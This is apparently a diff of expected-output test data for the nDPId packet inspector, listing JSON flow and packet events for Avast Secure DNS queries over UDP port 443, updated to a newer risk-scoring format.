+00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625483073457,"flow_last_seen":1625483073457,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625483073457,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":51929,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
 00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1625483073457,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"ts_msec":1625483073457,"pkt":"YDjgxTWgeJS0JASgCABFAADMZ5oAADIRhA+11iOVwKgCZAG7ytkAuAb9WvqBgAABAAEAAAAAATIJU0VjVXJlRG5zBWFWQXN0A2NPbQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625483073457,"flow_last_seen":1625483073457,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625483073457,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":52417,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1625483073457,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"ts_msec":1625483073457,"pkt":"eJS0JASgYDjgxTWgCABFAABDRzoAAH8RV\/jAqAJktdYjlczBAbsAL78\/SIEBAAABAAAAAAAAATIJc2VDVXJlZE5zBWFWQVNUA2NPTQAAEAAB"}
-00679{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625483073457,"flow_last_seen":1625483073457,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625483073457,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":52417,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625483073457,"flow_last_seen":1625483073457,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625483073457,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":52417,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
 00680{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1625483073457,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"ts_msec":1625483073457,"pkt":"YDjgxTWgeJS0JASgCABFAADMX7kAADIRi\/C11iOVwKgCZAG7zMEAuDeuSIGBgAABAAEAAAAAATIJc2VDVXJlZE5zBWFWQVNUA2NPTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="}
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":63,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625483010449,"flow_last_seen":1625483010570,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625511643408,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":59613,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":63,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625483073457,"flow_last_seen":1625483073457,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625511643408,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":51929,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":63,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625482998213,"flow_last_seen":1625482998333,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625511643408,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64432,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":63,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625483073457,"flow_last_seen":1625483073457,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625511643408,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":52417,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":63,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625483073336,"flow_last_seen":1625483073457,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625511643408,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":65063,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":63,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625483010449,"flow_last_seen":1625483010570,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625511643408,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":59613,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":63,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625483073457,"flow_last_seen":1625483073457,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625511643408,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":51929,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":63,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625482998213,"flow_last_seen":1625482998333,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625511643408,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64432,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":63,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625483073457,"flow_last_seen":1625483073457,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625511643408,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":52417,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":63,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625483073336,"flow_last_seen":1625483073457,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625511643408,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":65063,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625511643408,"flow_last_seen":1625511643408,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625511643408,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":59474,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1625511643408,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"ts_msec":1625511643408,"pkt":"eJS0JASgYDjgxTWgCABFAABDhScAAH8RGgvAqAJktdYjlehSAbsAL7NiOO0BAAABAAAAAAAAATIJU2VDVVJFZG5zBUFWYVN0A2NPTQAAEAAB"}
-00679{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":63,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625511643408,"flow_last_seen":1625511643408,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625511643408,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":59474,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":63,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625511643408,"flow_last_seen":1625511643408,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625511643408,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":59474,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
 00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1625511643529,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"ts_msec":1625511643529,"pkt":"YDjgxTWgeJS0JASgCABFAADM0vYAADMRF7O11iOVwKgCZAG76FIAuCvROO2BgAABAAEAAAAAATIJU2VDVVJFZG5zBUFWYVN0A2NPTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":65,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625511645426,"flow_last_seen":1625511645426,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625511645426,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":53839,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1625511645426,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"ts_msec":1625511645426,"pkt":"eJS0JASgYDjgxTWgCABFAABDhSsAAH8RGgfAqAJktdYjldJPAbsAL0czmx8BAAABAAAAAAAAATIJc2VDVVJFRE5TBWF2QVN0A2NvbQAAEAAB"}
-00679{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":65,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625511645426,"flow_last_seen":1625511645426,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625511645426,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":53839,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":65,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625511645426,"flow_last_seen":1625511645426,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625511645426,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":53839,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
 00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1625511645546,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"ts_msec":1625511645546,"pkt":"YDjgxTWgeJS0JASgCABFAADM008AADMRF1q11iOVwKgCZAG70k8AuL+hmx+BgAABAAEAAAAAATIJc2VDVVJFRE5TBWF2QVN0A2NvbQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="}
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":67,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625511643408,"flow_last_seen":1625511643529,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625556065479,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":59474,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":67,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625511645426,"flow_last_seen":1625511645546,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625556065479,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":53839,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":67,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625511643408,"flow_last_seen":1625511643529,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625556065479,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":59474,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":67,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625511645426,"flow_last_seen":1625511645546,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625556065479,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":53839,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":67,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625556065479,"flow_last_seen":1625556065479,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625556065479,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":55948,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1625556065479,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"ts_msec":1625556065479,"pkt":"eJS0JASgYDjgxTWgCABFAABDHAQAAH8Rgy7AqAJktdYjldqMAbsAL9sh3zMBAAABAAAAAAAAATIJU2VDVXJlRG5zBUF2QVNUA0NPbQAAEAAB"}
-00679{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":67,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625556065479,"flow_last_seen":1625556065479,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625556065479,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":55948,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":67,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625556065479,"flow_last_seen":1625556065479,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625556065479,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":55948,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":68,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625556067432,"flow_last_seen":1625556067432,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625556067432,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":51383,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1625556067432,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"ts_msec":1625556067432,"pkt":"eJS0JASgYDjgxTWgCABFAABDHAgAAH8RgyrAqAJktdYjlci3AbsAL6ehZCkBAAABAAAAAAAAATIJc0VDVXJlRE5zBWF2YVNUA2NPTQAAEAAB"}
-00679{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625556067432,"flow_last_seen":1625556067432,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625556067432,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":51383,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625556067432,"flow_last_seen":1625556067432,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625556067432,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":51383,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
